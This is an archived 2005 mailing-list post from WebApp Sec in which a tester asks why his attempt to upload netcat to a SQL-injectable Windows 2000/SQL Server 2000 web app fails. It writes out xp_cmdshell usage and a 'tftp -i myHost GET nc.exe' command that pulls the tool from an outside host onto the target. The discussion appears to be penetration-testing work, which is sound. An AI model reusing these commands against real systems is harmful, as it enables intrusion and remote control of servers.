Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

webappsec logo WebApp Sec mailing list archives

TFTP and XP_CMDSHELL - Weird
From: "Andres Molinetti" <andymolinetti () hotmail com>
Date: Thu, 23 Jun 2005 13:55:12 +0000
Hi, I am testing a Web App vulnerable to SQL Injection.
It is hosted in a Windows 2000 SP4 and SQL 2000 with no patches.
No firewall whatsoever.
While trying to use the xp_cmdshell to upload nc.exe from my tftpd server to the Webserver, I experienced some problems. 

I was able to execute xp_cmdshell 'echo a > c:\a.txt' . File is created.
As administrator (using a windows cmd.exe shell) I ran "tftp -i myHost GET nc.exe c:\nc.exe". File is downloaded.
When I tried it through the wep app it failed. I tried directly through SQL Query Analizer and it also failed. 

SQL is running as a low priviledged account (sqlsvc)...
Then I ran (as Administrator) "runas /user:sqlsvc tftp -i myHost GET nc.exe c:\nc.exe" and IT FAILED.!!
Besides, through xp_cmdshell I was able to ping my SERVER and connect to any port on it..I can easily deduce that the problem is the TFTP client (tftp.exe), no the xp_cmdshell stored procedure... 

Any Ideas?

_________________________________________________________________
Moda para esta temporada. Ponte al día de todas las tendencias. http://www.msn.es/Mujer/moda/default.asp

  By Date           By Thread  

Current thread:
  • TFTP and XP_CMDSHELL - Weird Andres Molinetti (Jun 23)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]